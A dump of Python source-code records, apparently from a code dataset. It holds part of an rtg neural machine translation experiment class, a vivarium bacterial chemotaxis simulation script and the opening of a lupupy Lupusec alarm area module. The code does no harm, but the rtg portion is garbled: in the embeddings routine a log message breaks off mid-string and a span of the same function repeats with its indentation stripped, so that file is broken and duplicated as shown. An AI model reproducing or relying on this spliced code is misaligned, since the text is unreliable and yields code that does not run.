self._make_vocab(\"src\", self._src_field_file,\n                                                  args['pieces'], args['max_src_types'],\n                                                  corpus=[args['mono_train_src']], **xt_args)\n            else:\n                log.warning(\"Skipping source vocab creation since mono_train_src is not given\")\n\n            # target vocabulary\n            if 'mono_train_tgt' in args:\n                self.tgt_field = self._make_vocab(\"tgt\", self._tgt_field_file,\n                                                  args['pieces'], args['max_tgt_types'],\n                                                  corpus=[args['mono_train_tgt']], **xt_args)\n            else:\n                log.warning(\"Skipping target vocab creation since mono_train_tgt is not given\")\n\n        def _prep_file(file_key, out_file, do_truncate, max_len, field: Field):\n            if file_key not in args:\n                log.warning(f'Skipped: {file_key} because it is not found in config')\n                return\n\n            raw_file = args[file_key]\n\n            recs = TSVData.read_raw_mono_recs(raw_file, do_truncate, max_len, field.encode_as_ids)\n            # TODO: use SQLite storage\n            TSVData.write_mono_recs(recs, out_file)\n            if args.get('text_files'):\n                recs = TSVData.read_raw_mono_recs(raw_file, do_truncate, max_len, field.tokenize)\n                TSVData.write_mono_recs(recs, str(out_file).replace('.tsv', '.pieces.tsv'))\n\n        _prep_file('mono_train_src', self.mono_train_src, args['truncate'], args['src_len'],\n                   self.src_vocab)\n        _prep_file('mono_train_tgt', self.mono_train_tgt, args['truncate'], args['tgt_len'],\n                   self.tgt_vocab)\n\n        _prep_file('mono_valid_src', self.mono_valid_src, args['truncate'], args['src_len'],\n                   self.src_vocab)\n        _prep_file('mono_valid_tgt', self.mono_valid_tgt, args['truncate'], args['tgt_len'],\n                   self.tgt_vocab)\n\n    def _pre_process_parallel(self, src_key: str, tgt_key: str, out_file: Path,\n                              args: Optional[Dict[str, Any]] = None, line_check=True,\n                              split_ratio: float = 0.):\n        \"\"\"\n        Pre process records of a parallel corpus\n        :param args: all arguments for 'prep' task\n        :param src_key: key that contains source sequences\n        :param tgt_key: key that contains target sequences\n        :param out_file: path to store processed TSV data (compresses if name ends with .gz)\n        :return:\n        \"\"\"\n        args = args if args else self.config['prep']\n        log.info(f\"Going to prep files {src_key} and {tgt_key}\")\n        assert src_key in args, f'{src_key} not found in experiment config or args'\n        assert tgt_key in args, f'{tgt_key} not found in experiment config or args'\n        if line_check:\n            assert line_count(args[src_key]) == line_count(args[tgt_key]), \\\n                f'{args[src_key]} and {args[tgt_key]} must have same 
number of lines'\n        # create Piece IDs\n        s_time = time.time()\n        reader_func = TSVData.read_raw_parallel_recs\n        parallel_recs = reader_func(\n            args[src_key], args[tgt_key], args['truncate'], args['src_len'], args['tgt_len'],\n            src_tokenizer=partial(self.src_vocab.encode_as_ids, split_ratio=split_ratio),\n            tgt_tokenizer=partial(self.tgt_vocab.encode_as_ids, split_ratio=split_ratio))\n        if any([out_file.name.endswith(suf) for suf in ('.db', '.db.tmp')]):\n            SqliteFile.write(out_file, records=parallel_recs)\n        else:\n            TSVData.write_parallel_recs(parallel_recs, out_file)\n        e_time = time.time()\n        log.info(f\"Time taken to process: {timedelta(seconds=(e_time - s_time))}\")\n        if args.get('text_files'):\n            # Redo again as plain text files\n            parallel_recs = reader_func(\n                args[src_key], args[tgt_key], args['truncate'], args['src_len'], args['tgt_len'],\n                src_tokenizer=self.src_vocab.tokenize, tgt_tokenizer=self.tgt_vocab.tokenize)\n\n            text_file_name = str(out_file).replace('.db', '.tsv.gz').replace('.tsv', '.pieces.tsv')\n            TSVData.write_parallel_recs(parallel_recs, text_file_name)\n\n    def maybe_pre_process_embeds(self, do_clean=False):\n\n        def _read_vocab(path: Path) -> List[str]:\n            with IO.reader(path) as rdr:\n                vocab = [line.strip().split()[0] for line in rdr]\n                if do_clean:\n                    # sentence piece starts with '▁' character\n                    vocab = [word[1:] if word[0] == '▁' else word for word in vocab]\n                return vocab\n\n        def _map_and_store(inp: Path, vocab_file: Path):\n            id_to_str = _read_vocab(vocab_file)\n            str_to_id = {tok: idx for idx, tok in enumerate(id_to_str)}\n            assert len(id_to_str) == len(str_to_id)  # tokens must be unique\n            vocab_size = len(id_to_str)\n\n            matched_set, ignored_set, duplicate_set = set(), set(), set()\n\n            with inp.open(encoding='utf-8') as in_fh:\n                header = in_fh.readline()\n                parts = header.strip().split()\n                if len(parts) == 2:\n                    tot, dim = int(parts[0]), int(parts[1])\n                    matrix = torch.zeros(vocab_size, dim)\n                else:\n                    assert len(parts) > 2\n                    word, vec = parts[0], [float(x) for x in parts[1:]]\n                    dim = len(vec)\n                    matrix = torch.zeros(vocab_size, dim)\n                    if word in str_to_id:\n                        matrix[str_to_id[word]] = torch.tensor(vec, dtype=torch.float)\n                        matched_set.add(word)\n                    else:\n                        ignored_set.add(word)\n\n                for line in in_fh:\n                    parts = line.strip().split()\n                    word = parts[0]\n                    if word in str_to_id:\n                        if word in matched_set:\n                            duplicate_set.add(word)\n                        # Note: this overwrites duplicate words\n                        vec = [float(x) for x in parts[1:]]\n                        matrix[str_to_id[word]] = torch.tensor(vec, dtype=torch.float)\n                        matched_set.add(word)\n                    else:\n                        ignored_set.add(word)\n            pre_trained = matched_set | ignored_set\n            vocab_set = set(id_to_str)\n            oovs = vocab_set - matched_set\n            stats = {\n                'pre_trained': len(pre_trained),\n                'vocab': len(vocab_set),\n                'matched': len(matched_set),\n                'ignored': len(ignored_set),\n                'oov': len(oovs)\n            }\n            stats.update({\n                'oov_rate': stats['oov'] / stats['vocab'],\n                'match_rate': stats['matched'] / stats['vocab'],\n                'useless_rate': stats['ignored'] / stats['pre_trained'],\n                'useful_rate': stats['matched'] / stats['pre_trained']\n            })\n            return matrix, stats\n\n        def _write_emb_matrix(matrix, path: str):\n            torch.save(matrix, path)\n\n        def _write_dict(data, path: Path):\n            with IO.writer(path) as out:\n                for key, val in data.items():\n                    out.write(f\"{key}\\t{val}\\n\")\n\n        args = self.config['prep']\n        mapping = {\n            'pre_emb_src': self.emb_src_file,\n            'pre_emb_tgt': self.emb_tgt_file,\n            'ext_emb_src': self.ext_emb_src_file,\n            'ext_emb_tgt': self.ext_emb_tgt_file,\n        }\n        if not any(x in args for x in mapping):\n            log.info(\"No pre-trained 
\n\n def _write_emb_matrix(matrix, path: str):\n torch.save(matrix, path)\n\n def _write_dict(data, path: Path):\n with IO.writer(path) as out:\n for key, val in data.items():\n out.write(f\"{key}\\t{val}\\n\")\n\n args = self.config['prep']\n mapping = {\n 'pre_emb_src': self.emb_src_file,\n 'pre_emb_tgt': self.emb_tgt_file,\n 'ext_emb_src': self.ext_emb_src_file,\n 'ext_emb_tgt': self.ext_emb_tgt_file,\n }\n if not any(x in args for x in mapping):\n log.info(\"No pre-trained embeddings found in config; skipping\")\n return\n\n for key, outp in mapping.items():\n if key in args:\n inp = Path(args[key])\n assert inp.exists()\n voc_file = self.data_dir / 'sentpiece.shared.vocab'\n if not voc_file.exists():\n field_name = key.split('_')[-1] # emb_src --> src ; emb_tgt --> tgt\n voc_file = self.data_dir / f'sentpiece.{field_name}.vocab'\n assert voc_file.exists()\n\n log.info(f\"Processing {key}: {inp}\")\n emb_matrix, report = _map_and_store(inp, voc_file)\n _write_dict(report, Path(str(outp) + '.report.txt'))\n _write_emb_matrix(emb_matrix, str(outp))\n\n def shrink_vocabs(self):\n assert self.codec_name == 'nlcodec', 'Only nlcodec supports shrinking of vocabs'\n args = self.config['prep']\n\n if self.shared_vocab:\n corpus = [args[key] for key in ['train_src', 'train_tgt', 'mono_src', 'mono_tgt']\n if args.get(key)]\n remap_src = self.shared_vocab.shrink_vocab(files=corpus, min_freq=1,\n save_at=self._shared_field_file)\n remap_tgt = remap_src\n else:\n corpus_src = [args[key] for key in ['train_src', 'mono_src'] if args.get(key)]\n remap_src = self.src_vocab.shrink_vocab(files=corpus_src, min_freq=1,\n save_at=self._src_field_file)\n corpus_tgt = [args[key] for key in ['train_tgt', 'mono_tgt'] if args.get(key)]\n remap_tgt = self.tgt_vocab.shrink_vocab(files=corpus_tgt, min_freq=1,\n save_at=self._tgt_field_file)\n self.reload_vocabs()\n self.model_args['src_vocab'] = len(self.src_vocab)\n self.model_args['tgt_vocab'] = len(self.tgt_vocab)\n return remap_src, remap_tgt\n\n def inherit_parent(self):\n parent = self.config['parent']\n parent_exp = TranslationExperiment(parent['experiment'], read_only=True)\n log.info(f\"Parent experiment: {parent_exp.work_dir}\")\n parent_exp.has_prepared()\n vocab_spec = parent.get('vocab')\n if vocab_spec:\n log.info(f\"Parent vocabs inheritance spec: {vocab_spec}\")\n codec_lib = parent_exp.config['prep'].get('codec_lib')\n if codec_lib:\n self.config['prep']['codec_lib'] = codec_lib\n\n def _locate_field_file(exp: TranslationExperiment, name, check_exists=False) -> Path:\n switch = {'src': exp._src_field_file,\n 'tgt': exp._tgt_field_file,\n 'shared': exp._shared_field_file}\n assert name in switch, f'{name} not allowed; valid options= {switch.keys()}'\n file = switch[name]\n if check_exists:\n assert file.exists(), f'{file} does not exist; for {name} of {exp.work_dir}'\n return file\n\n for to_field, from_field in vocab_spec.items():\n from_field_file = _locate_field_file(parent_exp, from_field, check_exists=True)\n to_field_file = _locate_field_file(self, to_field, check_exists=False)\n IO.copy_file(from_field_file, to_field_file)\n self.reload_vocabs()\n else:\n log.info(\"No vocabularies are inherited from parent\")\n model_spec = parent.get('model')\n if model_spec:\n log.info(\"Parent model inheritance spec\")\n if model_spec.get('args'):\n self.model_args = parent_exp.model_args\n ensemble = model_spec.get('ensemble', 1)\n model_paths = parent_exp.list_models(sort='step', desc=True)[:ensemble]\n log.info(f\"Averaging {len(model_paths)} checkpoints of parent model: \\n{model_paths}\")\n from rtg.module.decoder import Decoder\n avg_state = Decoder.average_states(model_paths=model_paths)\n log.info(f\"Saving parent model's state to {self.parent_model_state}\")\n torch.save(avg_state, self.parent_model_state)\n\n shrink_spec = parent.get('shrink')\n if shrink_spec:\n remap_src, remap_tgt = self.shrink_vocabs()\n def map_rows(mapping: List[int], source: torch.Tensor, name=''):\n assert max(mapping) < len(source)\n 
target = torch.zeros((len(mapping), *source.shape[1:]),\n dtype=source.dtype, device=source.device)\n for new_idx, old_idx in enumerate(mapping):\n target[new_idx] = source[old_idx]\n log.info(f\"Mapped {name} {source.shape} --> {target.shape} \")\n return target\n\n \"\"\" src_embed.0.lut.weight [N x d]\n tgt_embed.0.lut.weight [N x d]\n generator.proj.weight [N x d]\n generator.proj.bias [N] \"\"\"\n if remap_src:\n key = 'src_embed.0.lut.weight'\n avg_state[key] = map_rows(remap_src, avg_state[key], name=key)\n if remap_tgt:\n map_keys = ['tgt_embed.0.lut.weight', 'generator.proj.weight', 'generator.proj.bias']\n for key in map_keys:\n if key not in avg_state:\n log.warning(f'{key} not found in avg_state of parent model. Mapping skipped')\n continue\n avg_state[key] = map_rows(remap_tgt, avg_state[key], name=key)\n if self.parent_model_state.exists():\n self.parent_model_state.rename(self.parent_model_state.with_suffix('.orig'))\n torch.save(avg_state, self.parent_model_state)\n self.persist_state() # this will fix src_vocab and tgt_vocab of model_args conf\n\n\n def pre_process(self, args=None, force=False):\n if self.has_prepared() and not force:\n log.warning(\"Already prepared\")\n return\n args = args if args else self.config['prep']\n if 'parent' in self.config:\n self.inherit_parent()\n\n if 'same_data' in args:\n data = Path(args['same_data']) / 'data'\n assert data.exists()\n log.info(f\"Reusing prepared data dir from {data}\")\n if self.data_dir.exists():\n if self.data_dir.is_symlink():\n self.data_dir.unlink()\n else:\n self.data_dir.rename('data.bak')\n self.data_dir.symlink_to(data.resolve(), target_is_directory=True)\n self.reload_vocabs()\n else:\n vocabs = args.get('vocabs')\n if vocabs:\n parent = TranslationExperiment(vocabs, read_only=True)\n parent.copy_vocabs(self)\n self.shared_field, self.src_field, self.tgt_field = [\n self.Field(str(f)) if f.exists() else None\n for f in (self._shared_field_file, self._src_field_file, self._tgt_field_file)]\n if self._unsupervised:\n self.pre_process_mono(args)\n else:\n self.pre_process_parallel(args)\n\n self.maybe_pre_process_embeds()\n # update state on disk\n self.persist_state()\n self._prepared_flag.touch()\n\n def persist_state(self):\n \"\"\"Writes state of current experiment to the disk\"\"\"\n assert not self.read_only\n if 'model_args' not in self.config:\n self.config['model_args'] = {}\n args = self.config['model_args']\n if self.model_type in {'rnnlm', 'tfmlm', 'wv_cbow'}:\n # Language models\n # TODO: improve the design of this thing\n args['vocab_size'] = max(len(self.src_vocab) if self.src_vocab else 0,\n len(self.tgt_vocab) if self.tgt_vocab else 0)\n else:\n # Translation models\n args['src_vocab'] = len(self.src_vocab) if self.src_vocab else 0\n args['tgt_vocab'] = len(self.tgt_vocab) if self.tgt_vocab else 0\n\n self.config['updated_at'] = datetime.now().isoformat()\n self.store_config()\n\n def train(self, args=None):\n run_args = copy.deepcopy(self.config.get('trainer', {}))\n if args:\n run_args.update(args)\n if 'init_args' in run_args:\n del run_args['init_args']\n train_steps = run_args['steps']\n finetune_steps = run_args.pop('finetune_steps', None)\n finetune_batch_size = run_args.pop('finetune_batch_size', run_args.get('batch_size'))\n if finetune_steps:\n assert type(finetune_steps) is int\n assert finetune_steps > train_steps, f'finetune_steps={finetune_steps} should be' \\\n f' greater than steps={train_steps}'\n\n _, last_step = self.get_last_saved_model()\n if self._trained_flag.exists():\n # 
noinspection PyBroadException\n try:\n last_step = max(last_step, yaml.safe_load(self._trained_flag.read_text())['steps'])\n except Exception as _:\n pass\n\n if last_step >= train_steps and (finetune_steps is None or last_step >= finetune_steps):\n log.warning(\n f\"Already trained up to {last_step}; requested: train={train_steps}, finetune={finetune_steps}. Skipped\")\n return\n\n from rtg.registry import trainers, factories\n name, optim_args = self.optim_args\n trainer = trainers[self.model_type](self, optim=name,\n model_factory=factories[self.model_type], **optim_args)\n if last_step < train_steps: # regular training\n stopped = trainer.train(fine_tune=False, **run_args)\n if not self.read_only:\n status = dict(steps=train_steps, early_stopped=stopped, finetune=False)\n try:\n status['earlier'] = yaml.safe_load(self._trained_flag.read_text())\n except Exception as _:\n pass\n yaml.dump(status, stream=self._trained_flag)\n if finetune_steps: # Fine tuning\n log.info(f\"Fine tuning up to {finetune_steps}, batch_size={finetune_batch_size}\")\n assert finetune_batch_size\n run_args['steps'] = finetune_steps\n run_args['batch_size'] = finetune_batch_size\n\n stopped = trainer.train(fine_tune=True, **run_args)\n status = dict(steps=finetune_steps, early_stopped=stopped, finetune=True)\n try:\n status['earlier'] = yaml.safe_load(self._trained_flag.read_text())\n except Exception as _:\n pass\n yaml.dump(status, stream=self._trained_flag)\n\n @property\n def src_vocab(self) -> Field:\n return self.shared_field if self.shared_field is not None else self.src_field\n\n @property\n def tgt_vocab(self) -> Field:\n return self.shared_field if self.shared_field is not None else self.tgt_field\n\n def _get_batch_args(self):\n prep_args = self.config.get('prep', {})\n return {ok: prep_args[ik] for ik, ok in\n [('src_len', 'max_src_len'), ('tgt_len', 'max_tgt_len'), ('truncate', 'truncate')]\n if ik in prep_args}\n\n def get_train_data(self, batch_size: Union[int, Tuple[int,int]], steps: int = 0, sort_by='eq_len_rand_batch',\n batch_first=True, shuffle=False, fine_tune=False, keep_in_mem=False,\n split_ratio: float = 0., dynamic_epoch=False):\n\n data_path = self.train_db if self.train_db.exists() else self.train_file\n if fine_tune:\n if not self.finetune_file.exists():\n # user may have added fine tune file later\n self._pre_process_parallel('finetune_src', 'finetune_tgt', self.finetune_file)\n log.info(\"Using Fine tuning corpus instead of training corpus\")\n data_path = self.finetune_file\n\n if split_ratio > 0:\n data_path = IO.maybe_tmpfs(data_path)\n train_file = data_path.with_suffix('.db.tmp')\n file_creator = partial(self.file_creator, train_file=train_file, split_ratio=split_ratio)\n train_data = GenerativeBatchIterable(\n file_creator=file_creator, batches=steps, batch_size=batch_size, field=self.tgt_vocab,\n dynamic_epoch=dynamic_epoch, batch_first=batch_first, shuffle=shuffle, sort_by=sort_by,\n **self._get_batch_args())\n else:\n data = BatchIterable(\n data_path=data_path, batch_size=batch_size, field=self.tgt_vocab, sort_by=sort_by,\n batch_first=batch_first, shuffle=shuffle, **self._get_batch_args())\n train_data = LoopingIterable(data, steps)\n\n return train_data\n\n\n def file_creator(self, train_file, split_ratio, *args, **kwargs):\n self._pre_process_parallel(*args, src_key='train_src', tgt_key='train_tgt',\n out_file=train_file, split_ratio=split_ratio, **kwargs)\n return train_file\n\n def get_val_data(self, batch_size: Union[int, Tuple[int,int]], sort_desc=False, batch_first=True,\n 
shuffle=False):\n raw_path = None\n prep = self.config.get('prep', {})\n if 'valid_src' in prep and 'valid_tgt' in prep:\n raw_path = prep['valid_src'], prep['valid_tgt']\n\n return BatchIterable(self.valid_file, batch_size=batch_size, sort_desc=sort_desc,\n batch_first=batch_first, shuffle=shuffle, field=self.tgt_vocab,\n keep_in_mem=True, raw_path=raw_path, **self._get_batch_args())\n\n def get_combo_data(self, batch_size: int, steps: int = 0, sort_desc=False, batch_first=True,\n shuffle=False):\n if not self.combo_file.exists():\n # user may have added fine tune file later\n self._pre_process_parallel('combo_src', 'combo_tgt', self.combo_file)\n combo_file = IO.maybe_tmpfs(self.combo_file)\n data = BatchIterable(\n combo_file, batch_size=batch_size, sort_desc=sort_desc, field=self.tgt_vocab,\n batch_first=batch_first, shuffle=shuffle, **self._get_batch_args()\n )\n if steps > 0:\n data = LoopingIterable(data, steps)\n return data\n\n def reload(self):\n exp = type(self)(self.work_dir, read_only=self.read_only)\n self.__dict__ = exp.__dict__\n\n def copy_vocabs(self, other):\n \"\"\"\n Copies vocabulary files from self to other\n :param other: other experiment\n :return:\n \"\"\"\n other: TranslationExperiment = other\n if not other.data_dir.exists():\n other.data_dir.mkdir(parents=True)\n for source, destination in [(self._src_field_file, other._src_field_file),\n (self._tgt_field_file, other._tgt_field_file),\n (self._shared_field_file, other._shared_field_file)]:\n if source.exists():\n IO.copy_file(source.resolve(), destination.resolve())\n src_txt_file = source.with_name(source.name.replace('.model', '.vocab'))\n if src_txt_file.exists():\n dst_txt_file = destination.with_name(\n destination.name.replace('.model', '.vocab'))\n IO.copy_file(src_txt_file, dst_txt_file)\n\n def get_mono_data(self, split: str, side: str, batch_size: int, sort_desc: bool = False,\n batch_first: bool = False, shuffle: bool = False, num_batches: int = 0):\n \"\"\"\n reads monolingual data\n :param split: name of the split. choices = {train, valid}\n :param side: which side ? choices = {src, tgt}\n :param batch_size: what should be batch size. 
example = 64\n :param sort_desc: should the seqs in batch be sorted descending order of length ?\n :param batch_first: should the first dimension be batch instead of time step ?\n :param shuffle: should the seqs be shuffled before reading (and for each re-reading\n if num_batches is too large)\n :param num_batches: how many batches to read?\n :return: iterator of batches\n \"\"\"\n assert side in ('src', 'tgt')\n assert split in ('train', 'valid')\n inp_file = {\n ('train', 'src'): self.mono_train_src,\n ('train', 'tgt'): self.mono_train_tgt,\n ('valid', 'src'): self.mono_valid_src,\n ('valid', 'tgt'): self.mono_valid_tgt,\n }[(split, side)]\n assert inp_file.exists()\n # read this file; use the shared-vocab-aware properties on both sides\n field = self.tgt_vocab if side == 'tgt' else self.src_vocab\n data = BatchIterable(inp_file, batch_size=batch_size, sort_desc=sort_desc,\n batch_first=batch_first, shuffle=shuffle, field=field,\n **self._get_batch_args())\n\n if num_batches > 0:\n data = LoopingIterable(data, num_batches)\n return data\n","sub_path":"rtg/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":41856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15438667","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport sys\nimport uuid\nimport argparse\nimport copy\n\nfrom vivarium.core.emitter import timeseries_from_data\nfrom vivarium.library.dict_utils import deep_merge\nfrom vivarium.core.experiment import (\n generate_state,\n Experiment\n)\nfrom vivarium.core.composition import (\n agent_environment_experiment,\n make_agents,\n simulate_experiment,\n plot_agents_multigen,\n process_in_compartment,\n EXPERIMENT_OUT_DIR,\n)\n\n# compartments\nfrom vivarium.compartments.static_lattice import StaticLattice\nfrom vivarium.compartments.chemotaxis_minimal import ChemotaxisMinimal\nfrom vivarium.compartments.chemotaxis_master import ChemotaxisMaster\nfrom vivarium.compartments.chemotaxis_flagella import (\n ChemotaxisVariableFlagella,\n ChemotaxisExpressionFlagella\n)\n\n# processes\nfrom vivarium.processes.Vladimirov2008_motor import MotorActivity\nfrom vivarium.processes.multibody_physics import agent_body_config\nfrom vivarium.plots.multibody_physics import (\n plot_temporal_trajectory,\n plot_agent_trajectory,\n plot_motility,\n)\nfrom vivarium.processes.static_field import make_field\n\n\n# make an agent from a lone MotorActivity process\nMotorActivityAgent = process_in_compartment(\n MotorActivity,\n paths={\n 'external': ('boundary',),\n 'internal': ('cell',)\n })\n\n\nDEFAULT_BOUNDS = [1000, 5000]\nDEFAULT_AGENT_LOCATION = [0.5, 0.1]\nDEFAULT_LIGAND_ID = 'MeAsp'\nDEFAULT_INITIAL_LIGAND = 25.0\nDEFAULT_ENVIRONMENT_TYPE = StaticLattice\n\n\ndef get_environment_config():\n # field parameters\n field_scale = 1.0\n exponential_base = 2e2\n field_center = [0.5, 0.0]\n\n # multibody process config\n multibody_config = {\n 'animate': False,\n 'jitter_force': 5e-4,\n 'bounds': DEFAULT_BOUNDS}\n\n # static field config\n field_config = {\n 'molecules': [DEFAULT_LIGAND_ID],\n 'gradient': {\n 'type': 'exponential',\n 'molecules': {\n DEFAULT_LIGAND_ID: {\n 'center': field_center,\n 'scale': field_scale,\n 'base': exponential_base}}},\n 'bounds': DEFAULT_BOUNDS}\n\n return {\n 'multibody': multibody_config,\n 'field': field_config}\n\nDEFAULT_ENVIRONMENT_CONFIG = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()\n}\n\nDEFAULT_AGENT_CONFIG = {\n 'ligand_id': DEFAULT_LIGAND_ID,\n 'initial_ligand': 
DEFAULT_INITIAL_LIGAND,\n 'external_path': ('global',),\n 'agents_path': ('..', '..', 'agents')\n}\n\n\n# run the simulation\ndef run_chemotaxis_experiment(\n agents_config=None,\n environment_config=None,\n initial_state=None,\n simulation_settings=None,\n experiment_settings=None):\n\n if not initial_state:\n initial_state = {}\n if not experiment_settings:\n experiment_settings = {}\n\n total_time = simulation_settings['total_time']\n emit_step = simulation_settings['emit_step']\n\n # agents ids\n agent_ids = []\n for config in agents_config:\n number = config['number']\n if 'name' in config:\n name = config['name']\n if number > 1:\n new_agent_ids = [name + '_' + str(num) for num in range(number)]\n else:\n new_agent_ids = [name]\n else:\n new_agent_ids = [str(uuid.uuid1()) for num in range(number)]\n config['ids'] = new_agent_ids\n agent_ids.extend(new_agent_ids)\n\n initial_agent_body = agent_body_config({\n 'bounds': DEFAULT_BOUNDS,\n 'agent_ids': agent_ids,\n 'location': DEFAULT_AGENT_LOCATION})\n initial_state.update(initial_agent_body)\n\n # make the experiment\n experiment = agent_environment_experiment(\n agents_config,\n environment_config,\n initial_state,\n experiment_settings)\n\n # simulate\n settings = {\n 'total_time': total_time,\n 'emit_step': emit_step,\n 'return_raw_data': True}\n return simulate_experiment(experiment, settings)\n\n\ndef run_mixed(out_dir='out'):\n total_time = 720\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'type': ChemotaxisMinimal,\n 'name': 'motor_receptor',\n 'number': 1,\n 'config': DEFAULT_AGENT_CONFIG\n },\n {\n 'type': MotorActivityAgent,\n 'name': 'motor',\n 'number': 1,\n 'config': DEFAULT_AGENT_CONFIG\n }\n ]\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()\n }\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step\n }\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_variable(out_dir='out'):\n total_time = 720\n emit_step = 0.1\n\n flagella_numbers = [0, 3, 6, 9, 12]\n\n baseline_agent_config = {\n 'number': 1,\n 'type': ChemotaxisVariableFlagella,\n 'config': DEFAULT_AGENT_CONFIG\n }\n\n # configure\n agents_config = []\n for n_flagella in flagella_numbers:\n agent_config = copy.deepcopy(baseline_agent_config)\n agent_config['name'] = '{}_flagella'.format(n_flagella)\n agent_config['config'].update({'n_flagella': n_flagella})\n agents_config.append(agent_config)\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()}\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step}\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_minimal(out_dir='out'):\n total_time = 30\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'number': 6,\n 'name': 'minimal',\n 'type': ChemotaxisMinimal,\n 'config': DEFAULT_AGENT_CONFIG,\n }\n ]\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step}\n\n data = run_chemotaxis_experiment(\n 
agents_config=agents_config,\n environment_config=DEFAULT_ENVIRONMENT_CONFIG,\n simulation_settings=simulation_settings\n )\n\n # plot\n field_config = DEFAULT_ENVIRONMENT_CONFIG['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_master(out_dir='out'):\n # TODO -- master requires environment for metabolism external\n\n agent_type = ChemotaxisMaster\n total_time = 30\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'number': 1,\n 'name': 'master',\n 'type': agent_type,\n 'config': DEFAULT_AGENT_CONFIG\n }\n ]\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config(),\n }\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step,\n }\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef plot_chemotaxis_experiment(\n data,\n field_config,\n out_dir):\n\n # multigen agents plot\n plot_settings = {\n 'agents_key': 'agents',\n 'max_rows': 30,\n 'skip_paths': [\n ('boundary', 'mass'),\n ('boundary', 'length'),\n ('boundary', 'width'),\n ('boundary', 'location'),\n ]}\n plot_agents_multigen(data, plot_settings, out_dir, 'agents')\n\n # trajectory and motility\n agents_timeseries = timeseries_from_data(data)\n field = make_field(field_config)\n trajectory_config = {\n 'bounds': field_config['bounds'],\n 'field': field,\n 'rotate_90': True}\n\n plot_temporal_trajectory(copy.deepcopy(agents_timeseries), trajectory_config, out_dir, 'temporal')\n plot_agent_trajectory(agents_timeseries, trajectory_config, out_dir, 'trajectory')\n try:\n plot_motility(agents_timeseries, out_dir, 'motility_analysis')\n except Exception:\n print('plot_motility failed')\n\n\ndef make_dir(out_dir):\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n\nif __name__ == '__main__':\n out_dir = os.path.join(EXPERIMENT_OUT_DIR, 'chemotaxis')\n make_dir(out_dir)\n\n parser = argparse.ArgumentParser(description='multibody')\n parser.add_argument('--minimal', '-n', action='store_true', default=False)\n parser.add_argument('--master', '-m', action='store_true', default=False)\n parser.add_argument('--variable', '-v', action='store_true', default=False)\n parser.add_argument('--mixed', '-x', action='store_true', default=False)\n args = parser.parse_args()\n no_args = (len(sys.argv) == 1)\n\n if args.minimal or no_args:\n minimal_out_dir = os.path.join(out_dir, 'minimal')\n make_dir(minimal_out_dir)\n run_minimal(minimal_out_dir)\n elif args.master:\n master_out_dir = os.path.join(out_dir, 'master')\n make_dir(master_out_dir)\n run_master(master_out_dir)\n elif args.variable:\n variable_out_dir = os.path.join(out_dir, 'variable')\n make_dir(variable_out_dir)\n run_variable(variable_out_dir)\n elif args.mixed:\n mixed_out_dir = os.path.join(out_dir, 'mixed')\n make_dir(mixed_out_dir)\n run_mixed(mixed_out_dir)\n","sub_path":"vivarium/experiments/chemotaxis.py","file_name":"chemotaxis.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391548095","text":"\"\"\"\nLupusec Area\n\"\"\"\n\nimport logging\n\nfrom lupupy.devices import Device\n\n_LOGGER = logging.getLogger(__name__)\n\nDISARM = 0\nARM = 1\nHOME1 = 2\nHOME2 = 3\nHOME3 = 4\n\n\nclass Area(Device):\n \"\"\"Class to represent the 
Lupusec alarm as a device.\"\"\"\n\n def refresh(self):\n \"\"\"Refresh the alarm device.\"\"\"\n for area in self._lupusec.fetch_panel():\n if area[\"id\"] == self.id:\n self._data = area\n break\n\n def set_home(self, level=1):\n \"\"\"Arm Lupusec to home mode.\"\"\"\n if level == 1:\n return self.__set_mode(HOME1)\n if level == 2:\n return self.__set_mode(HOME2)\n if level == 3:\n return self.__set_mode(HOME3)\n\n raise Exception(\"invalid level\")\n\n def set_armed(self):\n \"\"\"Arm Lupusec to armed mode.\"\"\"\n return self.__set_mode(ARM)\n\n def set_disarmed(self):\n \"\"\"Disarm Lupusec.\"\"\"\n return self.__set_mode(DISARM)\n\n def __set_mode(self, mode):\n \"\"\"Set Lupusec alarm mode.\"\"\"\n\n if mode not in [ARM, DISARM, HOME1, HOME2, HOME3]:\n return _LOGGER.warning(\"Invalid mode\")\n\n response = self._lupusec.set_mode(mode=mode, area=self.id)\n\n if response[\"result\"] != 1:\n _LOGGER.warning(\"Mode setting unsuccessful: %s\", response[\"message\"])\n return False\n\n self._data[\"mode\"] = r\"{AREA_MODE_%s}\" % mode\n _LOGGER.info(\"Mode set to: %s\", self.mode)\n\n return True\n\n @property\n def id(self): # pylint: disable=C0103\n \"\"\"The area id\"\"\"\n return self._data.get(\"id\")\n\n @property\n def name(self):\n 